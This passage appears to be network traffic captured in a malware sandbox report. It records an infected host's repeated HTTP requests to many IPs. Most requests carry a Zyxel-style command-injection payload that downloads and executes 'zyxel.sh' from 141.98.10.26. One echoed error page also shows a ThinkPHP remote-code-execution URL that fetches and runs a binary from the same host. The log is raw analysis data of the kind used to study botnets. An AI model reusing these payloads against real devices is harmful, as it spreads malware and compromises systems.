Nov 22, 2023 08:38:49.574628115 CET	7286	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:49 GMT Content-Type: text/html Content-Length: 2829 Connection: close x-ws-request-id: 655db009_PS-XMN-01QxF36_17859-6951 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 37 3a 33 38 3a 34 39 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 58 4d 4e 2d 30 31 51 78 46 33 36 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 62 69 6e 73 2f Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 22 Nov 2023 07:38:49 GMT<br><span class="F">IP: 89.149.18.60</span>Node information: PS-XMN-01QxF36<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/
Nov 22, 2023 08:38:49.574640989 CET	7287	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu
Nov 22, 2023 08:38:49.574657917 CET	7288	IN	Data Raw: 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 Data Ascii: x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 655db009_PS-XMN-01QxF36_17859-6951<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="
Nov 22, 2023 08:38:49.675466061 CET	7302	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu
Nov 22, 2023 08:38:49.900506020 CET	7311	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu

Session ID	Source IP	Source Port	Destination IP	Destination Port
360	192.168.2.23	57152	94.110.185.58	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.353271008 CET	7261	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
361	192.168.2.23	48562	31.136.207.122	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.537447929 CET	7281	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:50.091520071 CET	7315	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.211410046 CET	7442	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.451037884 CET	7769	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:58.058351994 CET	8305	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:07.017107964 CET	9407	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:25.958468914 CET	11680	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.817259073 CET	16123	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
362	192.168.2.23	41808	31.136.22.229	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.538443089 CET	7282	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:50.123537064 CET	7316	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.243336916 CET	7442	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.707145929 CET	7789	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:58.314420938 CET	8316	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:07.275903940 CET	9420	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:25.958451986 CET	11678	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.817279100 CET	16124	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
363	192.168.2.23	47880	94.247.142.44	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.663301945 CET	7301	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
364	192.168.2.23	38524	31.136.41.101	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.721071959 CET	7303	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:50.283464909 CET	7329	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.403306961 CET	7446	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.707133055 CET	7789	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:58.314405918 CET	8315	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:07.273111105 CET	9420	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:25.958455086 CET	11679	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
